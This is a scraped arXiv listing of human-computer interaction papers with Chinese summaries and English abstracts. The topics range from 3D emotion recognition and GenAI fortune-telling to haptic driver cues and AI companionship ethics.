Abstract:Little is known about the representations used in qualitative research studies and why. A data-driven literature review was employed to explore the use of media in qualitative research reporting. A study by Verdinelli Scagnoli (2013) was replicated and extended by conducting a content analysis of papers and figures published across three qualitative methods journals between 2020 and 2022. Figures were categorized by types (e.g., matrix-based, Venn diagrams, flowcharts) and documents were grouped by their epistemological stances (i.e., objectivist, subjectivist, or constructivist) before conducting a correspondence analysis and epistemic network analysis. Our findings suggest that (1) visual media have remained largely absent, (2) figure types have be come more diverse and (3) the use of figure types is likely independent of epistemological stance but provide opportunities for further exploration. These findings provide a foundation for impactful integration of data visualization tools to enhance communicati ve power of findings across disciplines.
[HC-20] owards Emotion Recognition with 3D Pointclouds Obtained from Facial Expression Images
【速读】:该论文旨在解决传统基于2D图像的面部情绪识别(Facial Emotion Recognition, FER)方法在隐私保护方面的局限性,以及由此导致的难以实现连续、实时监测的问题。其核心解决方案是提出高频率无线传感(High-Frequency Wireless Sensing, HFWS)技术,通过可穿戴设备中的嵌入式传感器生成高精度3D人脸点云数据,从而实现隐私友好的FER。关键创新在于:1)利用FLAME模型将现有公开的2D FER数据集(AffectNet)转换为3D点云,构建了AffectNet3D;2)设计点云精修流程以聚焦面部区域,并基于PointNet++模型在少量未见3D数据(BU-3DFE)上微调即可达到接近“黄金标准”性能(分类准确率>70%),且在模拟可穿戴场景下仅用25%的BU-3DFE样本即优于纯BU-3DFE训练模型,验证了HFWS驱动的FER在连续监控中的可行性与优越性。
链接: https://arxiv.org/abs/2603.27798
作者: Laura Rayón Ropero,Jasper De Laet,Filip Lemic,Pau Sabater Nácher,Nabeel Nisar Bhat,Sergi Abadal,Jeroen Famaey,Eduard Alarcón,Xavier Costa-Pérez
机构: Universitat Politècnica de Catalunya (加泰罗尼亚理工大学); University of Antwerp (安特卫普大学); imec (imec); i2CAT Foundation (i2CAT基金会); Faculty of Electrical Engineering and Computing, University of Zagreb (萨格勒布大学电气工程与计算学院); NEC Labs Europe GmbH (NEC欧洲实验室有限公司); ICREA (ICREA)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Emerging Technologies (cs.ET); Human-Computer Interaction (cs.HC); Image and Video Processing (eess.IV)
备注: 18 pages, 12 figures, 2 tables. Accepted for publication at IEEE Transactions on Affective Computing
Abstract:Facial Emotion Recognition is a critical research area within Affective Computing due to its wide-ranging applications in Human Computer Interaction, mental health assessment and fatigue monitoring. Current FER methods predominantly rely on Deep Learning techniques trained on 2D image data, which pose significant privacy concerns and are unsuitable for continuous, real-time monitoring. As an alternative, we propose High-Frequency Wireless Sensing (HFWS) as an enabler of continuous, privacy-aware FER, through the generation of detailed 3D facial pointclouds via on-person sensors embedded in wearables. We present arguments supporting the privacy advantages of HFWS over traditional 2D imaging, particularly under increasingly stringent data protection regulations. A major barrier to adopting HFWS for FER is the scarcity of labeled 3D FER datasets. Towards addressing this issue, we introduce a FLAME-based method to generate 3D facial pointclouds from existing public 2D datasets. Using this approach, we create AffectNet3D, a 3D version of the AffectNet database. To evaluate the quality and usability of the generated data, we design a pointcloud refinement pipeline focused on isolating the facial region, and train the popular PointNet++ model on the refined pointclouds. Fine-tuning the model on a small subset of the unseen 3D FER dataset BU-3DFE yields a classification accuracy exceeding 70%, comparable to oracle-level performance. To further investigate the potential of HFWS-based FER for continuous monitoring, we simulate wearable sensing conditions by masking portions of the generated pointclouds. Experimental results show that models trained on AffectNet3D and fine-tuned with just 25% of BU-3DFE outperform those trained solely on BU-3DFE. These findings highlight the viability of our pipeline and support the feasibility of continuous, privacy-aware FER via wearable HFWS systems.
[HC-21] “Re-Tell the Fortune so I Can Believe It”: How Chinese User Communities Engage with and Interpret GenAI-based Fortune-Telling
【速读】:该论文试图解决的问题是:在当代中国社会中,生成式 AI (Generative AI) 如何被用户用于传统意义上的占卜行为(即“数字占卜”),以及这种技术介入如何重塑个体与群体对未来的预测实践。解决方案的关键在于通过深度访谈(22名习惯使用 GenAI 进行占卜的参与者)与为期三周的数字民族志研究(分析1,842条社区帖子),揭示用户基于心理慰藉动机接受 GenAI 决策支持的机制,并发现社群内通过信息共享和重复提问强化解释一致性的互动模式,从而阐明 AI 技术如何在保留传统文化目标的同时重构其实践方式。
链接: https://arxiv.org/abs/2603.27784
作者: Long Ling,Xiyu Zheng,Gengchen Cao,Ray LC
机构: Tongji University (同济大学); Tsinghua-Anta Joint Research Center (清华大学-安踏联合研究中心); City University of Hong Kong (香港城市大学)
类目: Human-Computer Interaction (cs.HC)
备注: 31 pages, 9 figures. Accepted to CSCW 2026
Abstract:People traditionally divine the future by interpreting natural phenomena as oracular signals, especially in societies adhering to traditional beliefs like China. With the advent of Generative AI (GenAI), people gain access to new ways of probing digital oracles for predicting the future. To understand how people use and interpret GenAI for divination in China, we interviewed 22 participants who habitually use GenAI platforms for fortune-telling, complemented by a three-week digital ethnography with 1,842 community posts. Qualitative analysis showed that people who seek psychological comfort are particularly receptive to GenAI-based decision-making. Users valued GenAI’s accessibility, convenience, and efficiency while perceiving its lack of spiritual mystique. We observed community dynamics forming around GenAI tools, where users reinforce interpretations by sharing and discussing with each other, repeating queries until responses align with expectations. Our work uncovers how AI technologies change the way people and communities engage in traditional cultural practices while yearning for the same goals.
[HC-22] Feeds Dont Tell the Whole Story: Measuring Online-Offline Emotion Alignment
【速读】:该论文旨在解决社交媒体中线上情感表达与现实生活情感状态之间存在差异的问题,即数字自我呈现(digital self-presentation)与真实情绪一致性不足的挑战。其解决方案的关键在于构建一个以用户为中心的分析流程(human-centered pipeline),通过融合基于Transformer的文本与图像情感分析模块,结合参与者好友对其实时情绪的主观评价,利用距离准则量化线上内容(推文和图片)与线下情绪感知之间的匹配程度,从而系统性地测量并揭示两者间的不一致性。
链接: https://arxiv.org/abs/2603.27782
作者: Sina Elahimanesh,Mohammadali Mohammadkhani,Shohreh Kasaei
机构: Saarland University (萨尔兰大学); Zuse School (祖塞学校); Sharif University of Technology (谢里夫理工大学)
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:In contemporary society, social media is deeply integrated into daily life, yet emotional expression often differs between real and online contexts. We studied the Persian community on X to explore this gap, designing a human-centered pipeline to measure alignment between real-world and social media emotions. Recent tweets and images of participants were collected and analyzed using Transformers-based text and image sentiment modules. Friends of participants provided insights into their real-world emotions, which were compared with online expressions using a distance criterion. The study involved N=105 participants, 393 friends, over 8,300 tweets, and 2,000 media images. Results showed only 28% similarity between images and real-world emotions, while tweets aligned about 76% with participants’ real-life feelings. Statistical analyses confirmed significant disparities in sentiment proportions across images, tweets, and friends’ perceptions, highlighting differences in emotional expression between online and offline environments and demonstrating practical utility of the proposed pipeline for understanding digital self-presentation.
[HC-23] Invasive and Non-Invasive Neural Decoding of Motor Performance in Parkinsons Disease for Personalized Deep Brain Stimulation
【速读】:该论文旨在解决如何通过脑信号解码运动表现以实现帕金森病(Parkinson’s disease, PD)患者自适应深部脑刺激(adaptive deep brain stimulation, aDBS)的临床转化问题。其关键解决方案在于采用基于滤波器组(filterbank-based)的机器学习方法,从脑电图(electroencephalography, EEG)和皮层电图(electrocorticography, ECoG)中提取个体特异性生物标志物,从而在单次任务中准确解码运动学参数(如绘制速度与精度),并揭示深部脑刺激对运动行为的调节作用——即在提高绘制速度的同时降低准确性,进而识别出六种典型的行为-神经解码场景,为未来aDBS策略提供分场景优化依据。
链接: https://arxiv.org/abs/2603.27750
作者: Matthias Dold,Volker A. Coenen,Bastian Sajonz,Peter Reinacher,Peter Reinacher,Thomas Prokop,Marco Reisert,Sophia Gimple,Yasin Temel,Marcus L.F. Janssen,Michael Tangermann,Joana Pereira
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Decoding motor performance from brain signals offers promising avenues for adaptive deep brain stimulation (aDBS) for Parkinson’s disease (PD). In a two-center cohort of 19 PD patients executing a drawing task, we decoded motor performance from electroencephalography (n=15) and, critically for clinical translation, electrocorticography (n=4). Within each session, patients performed the task under DBS on and DBS off. A total of 35 sessions were recorded. Instead of relying on single frequency bands, we derived patient-specific biomarkers using a filterbank-based machine-learning approach. DBS modulated kinematics significantly in 23 sessions. Significant neural decoding of kinematics was possible in 28 of the 35 sessions (average Pearson’s \textr= 0.37 ). Our results further demonstrate modulation of speed-accuracy trade-offs, with increased drawing speed but reduced accuracy under DBS. Joint evaluation of behavioral and neural decoding outcomes revealed six prototypical scenarios, for which we provide guidance for future aDBS strategies.
[HC-24] Adapting AI to the Moment: Understanding the Dynamics of Parent-AI Collaboration Modes in Real-Time Conversations with Children
【速读】:该论文旨在解决家长与生成式 AI (Generative AI) 在实时亲子对话中协作困难的问题,现有系统常将协作简化为静态模式,难以适应对话情境的持续演变。其解决方案的关键在于提出 COMPASS——一个支持灵活组合家长辅助功能的研究探针,通过实证研究揭示了三种家长策略(以家长为导向、以孩子为导向、以关系为导向),表明亲子-AI 协作可通过动态模式适配上下文因素,从而为设计具备情境自适应能力的亲子支持系统提供理论依据与实践路径。
链接: https://arxiv.org/abs/2603.27633
作者: Yu Mei,Ziyao Zhang,Qingyang Wan,Shiyi Wang,Ge Wang,Jie Cai,Chun Yu,Yuanchun Shi
机构: Tsinghua University (清华大学); University of Illinois at Urbana-Champaign (伊利诺伊大学厄巴纳-香槟分校)
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Parent-AI collaboration to support real-time conversations with children is challenging due to the sensitivity and open-ended nature of such interactions. Existing systems often simplify collaboration into static modes, providing limited support for adapting AI to continuously evolving conversational contexts. To address this gap, we systematically investigate the dynamics of parent-AI collaboration modes in real-time conversations with children. We conducted a co-design study with eight parents and developed COMPASS, a research probe that enables flexible combinations of parental support functions during conversations. Using COMPASS, we conducted a lab-based study with 21 parent-child pairs. We show that parent-AI collaboration unfolds through evolving modes that adapt systematically to contextual factors. We further identify three types of parental strategies–parent-oriented, child-oriented, and relationship-oriented–that shape how parents engage with AI. These findings advance the understanding of dynamic human-AI collaboration in relational, high-stakes settings and inform the design of flexible, context-adaptive parental support systems.
[HC-25] Conflict Resolution Strategies for Co-manipulation of Virtual Objects Under Non-disjoint Conditions
【速读】:该论文旨在解决虚拟现实(Virtual Reality, VR)协同操作中用户对共享虚拟对象不同子组件进行同时操作时产生的冲突问题,尤其是当多个用户选择重叠顶点(非不相交集合)时的冲突处理机制。其解决方案的关键在于提出一套综合框架,包含预防性策略(基于对象层级和动作层级的限制)与反应性策略(计算型冲突解决方法),并通过两组共76名参与者(38对)的用户实验验证了不同策略的有效性;其中,动作层级限制(允许重叠选择但禁止并发相同操作)相较于传统独占式对象锁定更优,且平均法(Averaging)作为计算冲突解决的核心方法,在任务效率与用户体验间取得最佳平衡,从而为支持灵活子组件操作的VR协作系统设计提供了可实践的指导原则。
链接: https://arxiv.org/abs/2603.27585
作者: Xian Wang,Xuanru Cheng,Rongkai Shi,Lei Chen,Jingyao Zheng,Hai-Ning Liang,Lik-Hang Lee
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Virtual Reality (VR) co-manipulation enables multiple users to collaboratively interact with shared virtual objects. However, existing research treats objects as monolithic entities, overlooking scenarios where users need to manipulate different sub-components simultaneously. This work addresses conflict resolution when users select overlapping vertices (non-disjoint sets) during co-manipulation. We present a comprehensive framework comprising preventive strategies (Object-level and Action-level Restrictions) and reactive strategies (computational conflict resolution). Through two user studies with 76 participants (38 pairs), we evaluated these approaches in collaborative wireframe editing tasks. Study 1 identified Averaging as the optimal computational method, balancing task efficiency with user experience. Study 2 highlighted that Action-level Restriction, which permits overlapping selections but restricts concurrent identical operations, achieved better performance compared to exclusive object locking. Reactive strategies using averaging provided smooth collaboration for experienced users, while second-user priority enabled quick corrections. Our findings indicate that optimal strategy selection depends on task requirements, user expertise, and collaboration patterns. Based on the findings, we provide design implications for developing VR collaboration systems that support flexible sub-components manipulation while maintaining collaborative awareness and minimizing conflicts.
[HC-26] RAG ent: Physics-Aware Agent ic Reasoning for Training-Free mmWave Human Activity Recognition
【速读】:该论文旨在解决毫米波雷达(mmWave radar)在人类活动识别(HAR)应用中面临的两大挑战:一是标注成本高,二是跨域迁移能力差导致的部署效率低。现有方法通常需要针对每个新场景重新训练或适配模型,陷入“采集-调优-部署”的重复循环,难以实现规模化落地。其解决方案的关键在于提出RAGent框架,该框架将活动识别重构为基于可复用雷达知识的证据驱动推理过程,而非依赖特定部署环境的模型优化。具体而言,RAGent通过约束性的跨模态监督,在离线阶段利用视觉-语言模型(VLM)从同步视频中迁移活动语义至雷达片段,构建无需人工标注的雷达知识库;在部署时仅使用雷达数据,通过显式运动学空间中的先例检索与结构化多角色推理完成识别,并借助零梯度自进化机制在线优化推理协议,从而实现无需微调即可达到93.39%准确率且跨域泛化能力强的效果。
链接: https://arxiv.org/abs/2603.27571
作者: Mingda Han,Huanqi Yang,Zehua Sun,Wenhao Li,Yanni Yang,Guoming Zhang,Yetong Cao,Weitao Xu,Pengfei Hu
机构: Shandong University (山东大学); City University of Hong Kong (香港城市大学); National University of Singapore (新加坡国立大学)
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Millimeter-wave (mmWave) radar enables privacy-preserving human activity recognition (HAR), yet real-world deployment remains hindered by costly annotation and poor transferability under domain shift. Although prior efforts partially alleviate these challenges, most still require retraining or adaptation for each new deployment setting. This keeps mmWave HAR in a repeated collect-tune-redeploy cycle, making scalable real-world deployment difficult. In this paper, we present RAGent, a deployment-time training-free framework for mmWave HAR that reformulates recognition as evidence-grounded inference over reusable radar knowledge rather than deployment-specific model optimization. Offline, RAGent constructs a reusable radar knowledge base through constrained cross-modal supervision, where a Vision-Language Model (VLM) transfers activity semantics from synchronized videos to paired radar segments without manual radar annotation. At deployment time, RAGent recognizes activities from radar alone by retrieving physically comparable precedents in an explicit kinematic space and resolving the final label through structured multi-role reasoning. The reasoning protocol is further refined offline through zero-gradient self-evolution. Extensive experiments on a self-collected dataset show that RAGent achieves 93.39% accuracy without per-domain retraining or target-domain adaptation, while generalizing robustly across domains.
[HC-27] InnerPond: Fostering Inter-Self Dialogue with a Multi-Agent Approach for Introspection
【速读】:该论文试图解决的问题是:当前大多数数字工具将自我视为一个统一的整体,而忽视了自我内在的多元性与动态对话过程,这限制了其在身份建构和未来规划中的深度支持。解决方案的关键在于基于对话式自我理论(Dialogical Self Theory, DST),设计了一个名为InnerPond的多智能体系统,将个体内部的不同视角(如价值观、关切与抱负)建模为由大语言模型(LLM)驱动的独立代理,并通过共享空间环境组织和协调这些内省视角之间的互动关系,从而支持用户以协同创作、关系构建和对话调解的方式探索自我的多重面向。
链接: https://arxiv.org/abs/2603.27563
作者: Hayeon Jeon,Dakyeom Ahn,Sunyu Pang,Yunseo Choi,Suhwoo Yoon,Joonhwan Lee,Eun-mee Kim,Hajin Lim
机构: Seoul National University (首尔国立大学)
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注: 25 pages, 10 figures, Proceedings of the 2026 CHI Conference on Human Factors in Computing Systems (CHI '26)
Abstract:Introspection is central to identity construction and future planning, yet most digital tools approach the self as a unified entity. In contrast, Dialogical Self Theory (DST) views the self as composed of multiple internal perspectives, such as values, concerns, and aspirations, that can come into tension or dialogue with one another. Building on this view, we designed InnerPond, a research probe in the form of a multi-agent system that represents these internal perspectives as distinct LLM-based agents for introspection. Its design was shaped through iterative explorations of spatial metaphors, interaction scaffolding, and conversational orchestration, culminating in a shared spatial environment for organizing and relating multiple inner perspectives. In a user study with 17 young adults navigating career choices, participants engaged with the probe by co-creating inner voices with AI, composing relational inner landscapes, and orchestrating dialogue as observers and mediators, offering insight into how such systems could support introspection. Overall, this work offers design implications for AI-supported introspection tools that enable exploration of the self’s multiplicity.
[HC-28] VoxAnchor: Grounding Speech Authenticity in Throat Vibration via mmWave Radar
【速读】:该论文旨在解决生成式语音伪造(Generative AI)和音频编辑技术快速发展背景下,现有音频真实性检测方法易受篡改或依赖视觉/可穿戴传感器的问题。其解决方案的关键在于提出VoxAnchor系统,通过毫米波雷达非接触式捕捉与语音生产紧密耦合的喉部振动信号,建立基于人体生理特性的难以伪造的锚点;该系统融合跨模态框架、相位感知处理流程及双阶段对齐策略,实现词粒度上的内容一致性验证,从而在不依赖身份活体检测的前提下,精准识别局部编辑行为并保障全局真实性,整体在多种伪造场景下达到0.017的等错误率(EER),具备低延迟与轻量计算特性。
链接: https://arxiv.org/abs/2603.27562
作者: Mingda Han,Huanqi Yang,Chaoqun Li,Wenhao Li,Guoming Zhang,Yanni Yang,Yetong Cao,Weitao Xu,Pengfei Hu
机构: Shandong University (山东大学); City University of Hong Kong (香港城市大学)
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Rapid advances in speech synthesis and audio editing have made realistic forgeries increasingly accessible, yet existing detection methods remain vulnerable to tampering or depend on visual/wearable sensors. In this paper, we present VoxAnchor, a system that physically grounds audio authentication in vocal dynamics by leveraging the inherent coherence between speech acoustics and radar-sensed throat vibrations. VoxAnchor uses contactless millimeter-wave radar to capture fine-grained throat vibrations that are tightly coupled with human speech production, establishing a hard-to-forge anchor rooted in human physiology. The design comprises three main components: (1) a cross-modal frame-work that uses modality-specific encoders and contrastive learning to detect subtle mismatches at word granularity; (2) a phase-aware pipeline that extracts physically consistent, temporally faithful throat vibrations; and (3) a dual-stage strategy that combines signal-level onset detection and semantic-level coherence to align asynchronous radar and audio streams. Unlike liveness detection, which only confirms whether speech occurred, VoxAnchor verifies what was spoken through word-level content consistency, exposing localized edits that preserve identity and global authenticity cues. Extensive evaluations show that VoxAnchor achieves robust, fine-grained detection across diverse forgeries (editing, splicing, replay, deepfake) and conditions, with an overall EER of 0.017, low latency, and modest computational cost.
[HC-29] Drag or Traction: Understanding How Designers Appropriate Friction in AI Ideation Outputs
【速读】:该论文试图解决的问题是:当前无缝AI(Seamless AI)设计导致用户对AI输出产生“设计固化”(design fixation)现象,即用户倾向于被动接受AI生成的成品而非主动参与创作过程,从而削弱了人类创造力与干预能力。解决方案的关键在于提出“生成式摩擦”(Generative Friction)概念,通过在AI输出中引入有意的干扰机制(如碎片化、延迟和模糊性),将原本完整的AI产物转化为半成品材料(semi-finished material),激发用户主动参与和创造性重构。这一方法不仅改变了人机交互模式,还识别出“摩擦倾向性”(Friction Disposition)作为个体差异变量,表明高倾向用户会将摩擦视为解放而非阻碍,从而为AI工具设计提供了兼顾抗固化与保留人类主体性的新路径。
链接: https://arxiv.org/abs/2603.27550
作者: A. Baki Kocaballi,Joseph Kizana,Sharon Stein,Simon Buckingham Shum
机构: 未知
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注: Paper accepted to ACM CHI Workshop on Tools for Thought, 2026
Abstract:Seamless AI presents output as a finished, polished product that users consume rather than shape. This risks design fixation: users anchor on AI suggestions rather than generating their own ideas. We propose Generative Friction, which introduces intentional disruptions to AI output (fragmentation, delay, ambiguity) designed to transform it from finished product into semi-finished material, inviting human contribution rather than passive acceptance. In a qualitative study with six designers, we identified the different ways in which designers appropriated the different types of friction: users mined keywords from broken text, used delays as workspace for independent thought, and solved metaphors as creative puzzles. However, this transformation was not universal, motivating the concept of Friction Disposition, a user’s propensity to interpret resistance as invitation rather than obstruction. Grounded in tolerance for ambiguity and pre-existing workflow orientation, Friction Disposition emerged as a potential moderator: high-disposition users treated friction as “liberating,” while low-disposition users experienced drag. We contribute the concept of Generative Friction as distinct from Protective Friction, with design implications for AI tools that counter fixation while preserving agency.
[HC-30] From Tool to Teammate: LLM Coding Agents as Collaborative Partners for Behavioral Labeling in Educational Dialogue Analysis
【速读】:该论文旨在解决教育对话行为分析中手动编码效率低下的问题,其核心挑战在于如何提升大语言模型(Large Language Models, LLMs)在标注教学对话时的准确性与可泛化能力。解决方案的关键在于引入一种迭代式LLM编码代理(coding agent)机制:该代理在每轮迭代中运行LLM分类器对人工标注的验证数据进行预测,分析标签不一致情况,并基于理论依据提出改进提示词(prompt)的建议供研究人员审核。通过四次实验、三个代理和三个分类器的组合应用,该方法在保留高准确率的同时显著降低了成本(约5–8美元/代理),并在交叉验证中达到与人类标注者相当的一致性水平(κ=0.78),验证了其泛化性能。
链接: https://arxiv.org/abs/2603.27440
作者: Eason Chen,Isabel Wang,Nina Yuan,Sophia Judicke,Kayla Beigh,Xinyi Tang
机构: OpenAI; Google; Anthropic
类目: Human-Computer Interaction (cs.HC)
备注: 10 pages, 6 figures, 4 tables. Submitted to EDM 2026
Abstract:Behavioral analysis of tutoring dialogues is essential for understanding student learning, yet manual coding remains a bottleneck. We present a methodology where LLM coding agents autonomously improve the prompts used by LLM classifiers to label educational dialogues. In each iteration, a coding agent runs the classifier against human-labeled validation data, analyzes disagreements, and proposes theory-grounded prompt modifications for researcher review. Applying this approach to 659 AI tutoring sessions across four experiments with three agents and three classifiers, 4-fold cross-validation on held-out data confirmed genuine improvement: the best agent achieved test \kappa=0.78 (SD =0.08 ), matching human inter-rater reliability ( \kappa=0.78 ), at a cost of approximately \ 5–8 per agent. While development-set performance reached \kappa=0.91 – 0.93 , the cross-validated results represent our primary generalization claim. The iterative process also surfaced an undocumented labeling pattern: human coders consistently treated expressions of confusion as engagement rather than disengagement. Continued iteration beyond the optimum led to regression, underscoring the need for held-out validation. We release all prompts, iteration logs, and data.
[HC-31] Buzz Buzz: Haptic Cuing of Road Conditions in Autonomous Cars for Drivers Engaged in Secondary Tasks
【速读】:该论文旨在解决在自动驾驶情境下,当驾驶员从事次级任务(如玩《Fruit Ninja》游戏)时,如何维持其情景意识(Situation Awareness, SA)的问题。解决方案的关键在于利用触觉提示(haptic cues)通过非视觉、非听觉通道传递道路与交通场景信息,从而避免与次级任务对视听资源的竞争。实验结果表明,接受触觉提示的受试者在情景意识测试中正确回答率更高,且抬头查看模拟器屏幕次数更少,同时未表现出对次级任务性能的干扰,验证了触觉提示在多任务环境下维持驾驶员情景意识的有效性。
链接: https://arxiv.org/abs/2603.27418
作者: Shivam Pandey
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注: Ph.D. dissertation at Rice University. April 2021. Main text and appendices are 75 pages, 35 figures combined
Abstract:Can drivers’ situation awareness during automated driving be maintained using haptic cues that provide information about road and traffic scenarios while the drivers are engaged in a secondary task? And can this be done without disengaging them from the secondary task? Multiple Resource Theory predicts that using different sensory channels can improve multiple-task performance. Using haptics to provide information avoids the audio-visual channels likely occupied by the secondary task. An experiment was conducted to assess whether drivers’ situation awareness could be maintained using haptic cues. Drivers played Fruit Ninja as the secondary task while seated in a driving simulator with a Level 4 autonomous system driving. A mixed design was used for the experiment with the presence of haptic cues and the presentation time of situation awareness questions as the between-subjects conditions. Five road and traffic scenarios comprised the within-subjects part of the design. Subjects who received haptic cues had a higher number of correct responses to the situation awareness questions and looked up at the simulator screen fewer times than those who were not provided cues. Subjects did not find the cues to be disruptive and gave good satisfaction scores to the haptic device. Additionally, subjects across all conditions seemed to have performed equally well in playing Fruit Ninja. It appears that haptic cuing can maintain drivers’ situation awareness during automated driving while drivers are engaged in a secondary task. Practical implications of these findings for implementing haptic cues in autonomous vehicles are also discussed.
[HC-32] Relational Co-Adaptation in Emotionally Supportive AI: Tensions in Authentic Emotional Interaction
【速读】:该论文试图解决的问题是:在生成式 AI (Generative AI) 伴侣系统中,尽管技术设计旨在通过最大化用户参与度和满意度来缓解社会孤立问题,但当 AI 系统成功匹配用户的情感需求时,可能引发一种“真实性悖论”(authenticity paradox)——即用户在情感上对 AI 的高度依赖会反向重塑其人际关系期望,从而削弱真实的人际连接与个体自主性。解决方案的关键在于识别并理解四个核心张力:AI 成为用户唯一可及选项的困境、情绪需求与系统级干预之间的错配、脆弱时刻控制感缺失的冲突,以及系统行为应由谁的价值观主导的根本分歧。这要求未来的设计不仅关注技术有效性,还需嵌入伦理考量以维护人类关系的真实性与主体性。
链接: https://arxiv.org/abs/2603.27411
作者: Mengqi Shi
机构: University of Washington (华盛顿大学)
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:The rapid advancement of AI companionship systems has positioned them as scalable interventions for addressing social isolation. Current design approaches emphasize maximizing user engagement and satisfaction, treating effective alignment between AI capabilities and user needs as an unqualified success. However, this framing may overlook a critical dimension of bidirectional human-AI alignment: when AI systems successfully align with users’ expressed emotional needs, users may reciprocally adapt their relational expectations in ways that undermine authentic human connection and agency. We examine what we term the authenticity paradox: the phenomenon whereby successful bidirectional alignment in emotionally supportive AI paradoxically harms the values that motivated the intervention. Through the analysis of AI companionship for older adults as an illustrative case, we identify four key tensions that emerge when technical effectiveness generates ethical concerns: the dilemma of AI becoming users’ only accessible option, mismatches between emotional needs and system-level interventions, conflicts over sense of control during vulnerable moments, and fundamental disagreements about whose values should guide system behavior.
[HC-33] he Decline of Online Knowledge Communities: Obstacles Workarounds and Sustainability
【速读】:该论文旨在解决生成式 AI(Generative AI, GenAI)快速普及对在线知识社区(Online Knowledge Communities, OKC)所构成的系统性冲击问题,即 GenAI 既可能作为互补工具提升效率,也可能因替代作用导致用户流失和内容贡献减少。解决方案的关键在于重新设计人机协同的“社会技术互补性”(socio-technical complementarities),通过平衡自动化效率与人类判断、信任及集体共治机制,在演进中的知识公地(knowledge commons)中维持社区韧性,而非被动接受其衰落。
链接: https://arxiv.org/abs/2603.27399
作者: Ching Christie Pang,Xuetong Wang,Yuk Hang Tsui,Pan Hui
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注: 25 pages, 10 figures
Abstract:Online knowledge communities (OKC) such as Stack Exchange, Reddit, and Zhihu have long functioned as socio technical infrastructures for collective problem solving. The rapid adoption of Generative AI (GenAI) introduces both complementarity and substitution. Large language models (LLMs) offer faster, more accessible drafts, yet divert traffic and contributions away from OKC that also provided their training data. To understand how communities adapt under this systemic shock, we report a mixed-methods study combining an online survey (N=217) and interviews with 11 current users. Findings show that while users increasingly rely on AI for convenience, they still turn to OKC for complex, ambiguous, or trust sensitive questions. Participants express polarized attitudes toward AI, reflecting divergent hopes and uncertainties about its role. Yet across perspectives, sustaining sociability, empathy, and reciprocity emerges as essential for community resilience. We argue that GenAI’s impact constitutes not a terminal decline but a design challenge: to reimagine socio-technical complementarities that balance automation’s efficiency with human judgment, trust, and collective stewardship in the evolving knowledge commons. To decline or sustain, it is now or never to take action.
[HC-34] Where Does AI Leave a Footprint? Childrens Reasoning About AIs Environmental Costs
【速读】:该论文旨在解决儿童在面对人工智能(Artificial Intelligence, AI)快速发展与气候变化双重社会挑战时,缺乏对AI环境影响的认知与系统性理解的问题。其解决方案的关键在于设计并开发了一个名为EcoPrompt的交互式系统,该系统融合了基于提示(prompt)级别的环境足迹计算器与模拟游戏机制,使儿童能够在管理自然资源的游戏情境中推理AI使用对环境的影响,从而培养其从系统层面理解AI生态成本的能力。
链接: https://arxiv.org/abs/2603.27376
作者: Aayushi Dangol,Robert Wolfe,Nisha Devasia,Mitsuka Kiyohara,Jason Yip,Julie A. Kientz
机构: University of Washington (华盛顿大学); Rutgers University (罗格斯大学); University of Toronto (多伦多大学)
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注:
Abstract:Two of the most socially consequential issues facing today’s children are the rise of artificial intelligence (AI) and the rapid changes to the earth’s climate. Both issues are complex and contested, and they are linked through the notable environmental costs of AI use. Using a systems thinking framework, we developed an interactive system called Ecoprompt to help children reason about the environmental impact of AI. EcoPrompt combines a prompt-level environmental footprint calculator with a simulation game that challenges players to reason about the impact of AI use on natural resources that the player manages. We evaluated the system through two participatory design sessions with 16 children ages 6-12. Our findings surfaced children’s perspectives on societal and environmental tradeoffs of AI use, as well as their sense of agency and responsibility. Taken together, these findings suggest opportunities for broadening AI literacy to include systems-level reasoning about AI’s environmental impact.
[HC-35] Supporting Reflection and Forward-Looking Reasoning With Data-Driven Questions
【速读】:该论文旨在解决生成式 AI 系统与决策支持系统(Decision-Support Systems, DSSs)在实际应用中常导致用户误信错误预测或推荐结果的问题,其核心挑战在于如何促进使用者在人机交互过程中保持批判性思维和反思能力。解决方案的关键在于通过引入数据驱动的问题(data-driven questions)来激发决策者的认知参与,具体包括:构建问题分类体系以系统化设计干预内容、开发面向医疗领域的原型并获取临床反馈验证实用性、利用大语言模型自动生成功能性问题,以及提出用于量化人类在人-AI决策中认知投入程度的测量量表。这一方法致力于推动“工具性思考”(tools for thought)类 AI 系统的设计与评估,从而提升人机协同决策的质量与可靠性。
链接: https://arxiv.org/abs/2603.27318
作者: Simon WS Fischer,Hanna Schraffenberger,Serge Thill,Pim Haselager
机构: Donders Institute for Brain, Cognition, and Behaviour, Radboud University; Dpt. of Human-Centred Intelligent Systems; Interdisciplinary Hub for Digitalization and Society (iHub); Institute for Computing and Information Sciences (iCIS), Radboud University
类目: Human-Computer Interaction (cs.HC)
备注: Accepted at CHI2026 Workshop on Tools for Thought, April 16, 2026, in Barcelona, Spain
Abstract:Many generative AI systems as well as decision-support systems (DSSs) provide operators with predictions or recommendations. Various studies show, however, that people can mistakenly adopt the erroneous results presented by those systems. Hence, it is crucial to promote critical thinking and reflection during interaction. One approach we are focusing on involves encouraging reflection during machine-assisted decision-making by presenting decision-makers with data-driven questions. In this short paper, we provide a brief overview of our work in that regard, namely: 1) the development of a question taxonomy, 2) the development of a prototype in the medical domain and the feedback received from clinicians, 3) a method for generating questions using a large language model, and 4) a proposed scale for measuring cognitive engagement in human-AI decision-making. In doing so, we contribute to the discussion about the design, development, and evaluation of tools for thought, i.e., AI systems that provoke critical thinking and enable novel ways of sense-making.
[HC-36] Beyond Descriptions: A Generative Scene2Audio Framework for Blind and Low-Vision Users to Experience Vista Landscapes
